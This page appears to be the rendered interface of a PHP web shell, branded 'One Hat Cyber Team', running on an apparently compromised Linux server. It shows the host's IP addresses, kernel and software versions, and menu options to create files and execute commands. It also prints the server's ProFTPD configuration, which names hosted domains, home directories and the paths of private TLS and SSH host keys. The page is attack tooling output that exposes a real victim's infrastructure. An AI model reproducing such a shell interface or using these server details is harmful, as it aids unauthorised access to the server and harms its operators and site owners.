⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
proftpd
/
conf.d
/
View File Name :
virtualmin.conf
# chroot users into their home by default DefaultRoot ~ # Enable TLS LoadModule mod_tls.c TLSEngine on TLSRequired off TLSRSACertificateFile /etc/ssl/certs/proftpd.crt TLSRSACertificateKeyFile /etc/ssl/private/proftpd.key TLSOptions NoCertRequest NoSessionReuseRequired TLSVerifyClient off TLSLog /var/log/proftpd/tls.log <IfModule mod_tls_shmcache.c> TLSSessionCache shm:/file=/var/run/proftpd/sesscache </IfModule> # VirtualHost for SFTP (FTP over SSH) port LoadModule mod_sftp.c <VirtualHost 0.0.0.0> SFTPEngine on SFTPLog /var/log/proftpd/sftp.log # Configure the server to listen on 2222 (openssh owns 22) Port 2222 # Configure the RSA and ECDSA host keys, using the same host key # files that OpenSSH uses. SFTPHostKey /etc/proftpd/ssh_host_rsa_key SFTPHostKey /etc/proftpd/ssh_host_ecdsa_key # Configure the file used for comparing authorized public keys of users. SFTPAuthorizedUserKeys file:~/.sftp/authorized_keys # Enable compression SFTPCompression delayed # More then FTP max logins, as there are more ways to authenticate # using SSH2. MaxLoginAttempts 6 </VirtualHost> <VirtualHost smartagriculture.in> ServerName smartagriculture.in <Anonymous /home/smartagriculture/ftp> User ftp Group nogroup UserAlias anonymous ftp <Limit WRITE> DenyAll </Limit> RequireValidShell off <Limit LOGIN> DenyAll </Limit> </Anonymous> </VirtualHost> <VirtualHost drodro.com> ServerName drodro.com <Anonymous /home/drodrodrodro/ftp> User ftp Group nogroup UserAlias anonymous ftp <Limit WRITE> DenyAll </Limit> RequireValidShell off </Anonymous> </VirtualHost>